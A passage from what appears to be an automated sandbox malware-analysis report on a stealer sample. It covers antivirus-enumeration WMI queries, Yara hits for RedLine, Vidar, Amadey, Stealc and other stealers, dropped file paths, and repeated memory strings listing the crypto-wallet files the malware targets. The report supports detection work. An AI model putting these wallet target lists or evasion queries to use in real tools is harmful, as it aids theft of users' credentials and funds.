Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 20.2.Hkbsse.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.ldr.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.Hkbsse.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.Hkbsse.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.axplong.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.NewLatest.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.NewLatest.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.ldr.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Hkbsse.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.7.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.Hkbsse.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Hkbsse.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.axplong.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000000.1777423527.00000000006D1000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1584978674.0000000005410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3789339584.0000000000081000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1735836274.0000000000081000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1785237216.0000000000D51000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1794779691.00000000006D1000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1627435742.0000000000C51000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1678495437.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.1725227418.0000000000081000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1635383014.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.1698297314.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.1756819585.0000000000D51000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1635196355.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.1715094971.0000000000081000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ldr[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\NewLatest[1].exe, type: DROPPED

Yara detected Mars stealer

Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000034.00000002.1966115508.000000006B6EE000.00000004.00000001.01000000.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2124198557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 42.0.Explorers.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000000.1831961958.0000000000232000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3823740608.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1961435191.00000000008AF000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3789215805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1Vkf7silOj.exe, type: SAMPLE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.572b7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.svhosts.exe.870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e79190.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.4579ec.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.4579ec.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.a1fda6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.a1fda6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.gold.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.572b7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.904c14.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.904c14.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e79190.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.1Vkf7silOj.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000002.3823740608.0000000003E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1961435191.00000000008AF000.00000004.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.1843357617.0000000000891000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.1308164877.0000000000932000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3789215805.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1Vkf7silOj.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gold.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: alex5555555.exe PID: 8560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 123.exe PID: 8716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svhosts.exe PID: 8744, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2007530947.0000000002521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 8196, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6ee000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 54.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.TpWWMUpe0LEV.exe.6b6d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000034.00000002.1966115508.000000006B6EE000.00000004.00000001.01000000.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000036.00000002.2124198557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 8196, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 42.0.Explorers.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.8b100f.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.403de7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.3e25570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.alex5555555.exe.880000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q5C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLR
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000036.00000002.2124198557.000000000054A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: allets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia 